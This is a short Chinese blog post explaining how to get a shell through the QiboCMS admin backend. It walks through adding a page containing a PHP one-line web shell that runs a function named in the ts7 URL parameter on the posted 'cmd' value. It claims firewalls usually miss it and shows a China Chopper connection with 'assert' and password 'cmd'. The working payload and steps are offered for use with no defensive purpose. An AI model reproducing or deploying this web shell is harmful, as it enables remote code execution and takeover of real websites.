齐博CMS后台拿shell

/ 0评 / 0

百度搜索了下,还没大牛发出来过。

进入后台后:到快捷菜单----独立页面管理---增加页面---插入特俗一句话(<?php $_GET['ts7']($_POST['cmd']);?>

这个一句话一般防火墙是不会杀的。

然后菜刀连接如:  www.i0day.com/test.php?ts7=assert
密码cmd

发表评论

电子邮件地址不会被公开。 必填项已用*标注